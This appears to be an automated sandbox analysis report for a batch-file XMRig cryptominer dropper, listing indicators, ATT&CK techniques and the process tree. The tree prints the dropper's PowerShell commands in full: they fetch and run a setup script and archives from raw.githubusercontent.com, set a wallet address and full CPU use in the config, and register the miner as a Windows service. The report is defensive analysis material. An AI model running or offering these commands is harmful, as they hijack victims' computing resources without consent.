xmrig | a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f

Analysis

max time kernel
1200s
max time network
1176s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
25/06/2024, 16:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vers1.bat
Size

393B
MD5

ece9925dc634f1cc20e3fd7ff7a144bd
SHA1

8816112e72b7b64a668bf7214999d855a7e05bde
SHA256

a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f
SHA512

bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 54 IoCs

miner

resource	yara_rule
behavioral1/files/0x000100000002aa6c-62.dat	family_xmrig
behavioral1/files/0x000100000002aa6c-62.dat	xmrig
behavioral1/memory/3732-65-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-188-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-189-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-238-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-250-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-251-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-252-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2992-253-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4516	powershell.exe
4	4516	powershell.exe
5	928	powershell.exe
6	2900	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
3732	xmrig.exe
1552	nssm.exe
5056	nssm.exe
3552	nssm.exe
4780	nssm.exe
1892	nssm.exe
2964	nssm.exe
1532	nssm.exe
2992	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
1	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2336	sc.exe
3672	sc.exe
4584	sc.exe
5044	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3832	powershell.exe
928	powershell.exe
4260	powershell.exe
3468	powershell.exe
2520	powershell.exe
3232	powershell.exe
4516	powershell.exe
4368	powershell.exe
4212	powershell.exe
2900	powershell.exe
3616	powershell.exe
3020	powershell.exe
4620	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3056	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4056	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4516	powershell.exe
4516	powershell.exe
928	powershell.exe
928	powershell.exe
4620	powershell.exe
4620	powershell.exe
4260	powershell.exe
4260	powershell.exe
3616	powershell.exe
3616	powershell.exe
3468	powershell.exe
3468	powershell.exe
4368	powershell.exe
4368	powershell.exe
2520	powershell.exe
2520	powershell.exe
3232	powershell.exe
3232	powershell.exe
3020	powershell.exe
3020	powershell.exe
4212	powershell.exe
4212	powershell.exe
2900	powershell.exe
2900	powershell.exe
3832	powershell.exe
3832	powershell.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3032	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	4056	taskkill.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeLockMemoryPrivilege	2992	xmrig.exe
Token: SeDebugPrivilege	3032	taskmgr.exe
Token: SeSystemProfilePrivilege	3032	taskmgr.exe
Token: SeCreateGlobalPrivilege	3032	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2992	xmrig.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe
3032	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4588 wrote to memory of 4516	4588	cmd.exe	80
PID 4588 wrote to memory of 4516	4588	cmd.exe	80
PID 4516 wrote to memory of 2772	4516	powershell.exe	82
PID 4516 wrote to memory of 2772	4516	powershell.exe	82
PID 2772 wrote to memory of 2512	2772	cmd.exe	83
PID 2772 wrote to memory of 2512	2772	cmd.exe	83
PID 2512 wrote to memory of 1876	2512	net.exe	84
PID 2512 wrote to memory of 1876	2512	net.exe	84
PID 2772 wrote to memory of 2644	2772	cmd.exe	85
PID 2772 wrote to memory of 2644	2772	cmd.exe	85
PID 2772 wrote to memory of 4724	2772	cmd.exe	86
PID 2772 wrote to memory of 4724	2772	cmd.exe	86
PID 2772 wrote to memory of 4072	2772	cmd.exe	87
PID 2772 wrote to memory of 4072	2772	cmd.exe	87
PID 2772 wrote to memory of 1396	2772	cmd.exe	88
PID 2772 wrote to memory of 1396	2772	cmd.exe	88
PID 2772 wrote to memory of 2084	2772	cmd.exe	89
PID 2772 wrote to memory of 2084	2772	cmd.exe	89
PID 2772 wrote to memory of 4584	2772	cmd.exe	90
PID 2772 wrote to memory of 4584	2772	cmd.exe	90
PID 2772 wrote to memory of 5044	2772	cmd.exe	91
PID 2772 wrote to memory of 5044	2772	cmd.exe	91
PID 2772 wrote to memory of 4056	2772	cmd.exe	92
PID 2772 wrote to memory of 4056	2772	cmd.exe	92
PID 2772 wrote to memory of 3056	2772	cmd.exe	94
PID 2772 wrote to memory of 3056	2772	cmd.exe	94
PID 2772 wrote to memory of 928	2772	cmd.exe	95
PID 2772 wrote to memory of 928	2772	cmd.exe	95
PID 2772 wrote to memory of 4620	2772	cmd.exe	96
PID 2772 wrote to memory of 4620	2772	cmd.exe	96
PID 2772 wrote to memory of 4260	2772	cmd.exe	97
PID 2772 wrote to memory of 4260	2772	cmd.exe	97
PID 2772 wrote to memory of 3732	2772	cmd.exe	98
PID 2772 wrote to memory of 3732	2772	cmd.exe	98
PID 2772 wrote to memory of 1480	2772	cmd.exe	99
PID 2772 wrote to memory of 1480	2772	cmd.exe	99
PID 1480 wrote to memory of 3616	1480	cmd.exe	100
PID 1480 wrote to memory of 3616	1480	cmd.exe	100
PID 3616 wrote to memory of 3200	3616	powershell.exe	101
PID 3616 wrote to memory of 3200	3616	powershell.exe	101
PID 2772 wrote to memory of 3468	2772	cmd.exe	102
PID 2772 wrote to memory of 3468	2772	cmd.exe	102
PID 2772 wrote to memory of 4368	2772	cmd.exe	103
PID 2772 wrote to memory of 4368	2772	cmd.exe	103
PID 2772 wrote to memory of 2520	2772	cmd.exe	104
PID 2772 wrote to memory of 2520	2772	cmd.exe	104
PID 2772 wrote to memory of 3232	2772	cmd.exe	105
PID 2772 wrote to memory of 3232	2772	cmd.exe	105
PID 2772 wrote to memory of 3020	2772	cmd.exe	106
PID 2772 wrote to memory of 3020	2772	cmd.exe	106
PID 2772 wrote to memory of 4212	2772	cmd.exe	107
PID 2772 wrote to memory of 4212	2772	cmd.exe	107
PID 2772 wrote to memory of 2900	2772	cmd.exe	108
PID 2772 wrote to memory of 2900	2772	cmd.exe	108
PID 2772 wrote to memory of 3832	2772	cmd.exe	109
PID 2772 wrote to memory of 3832	2772	cmd.exe	109
PID 2772 wrote to memory of 2336	2772	cmd.exe	110
PID 2772 wrote to memory of 2336	2772	cmd.exe	110
PID 2772 wrote to memory of 3672	2772	cmd.exe	111
PID 2772 wrote to memory of 3672	2772	cmd.exe	111
PID 2772 wrote to memory of 1552	2772	cmd.exe	112
PID 2772 wrote to memory of 1552	2772	cmd.exe	112
PID 2772 wrote to memory of 5056	2772	cmd.exe	113
PID 2772 wrote to memory of 5056	2772	cmd.exe	113

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6E79.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2772
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2512
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:1876
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:2644
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:4724
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4072
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:1396
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:2084
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4584
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:5044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4056
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:3056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4260
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:3732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3616
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:3200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ucshggdd\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3832
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2336
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3672
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:1552
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:5056
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:3552
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:4780
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:1892
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:2964

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:1532
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2992

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3d24ee7706a2ca48bb579baeb969501f

SHA1
431fec5f67ff8d36f400cd6af727fc526debc7c9

SHA256
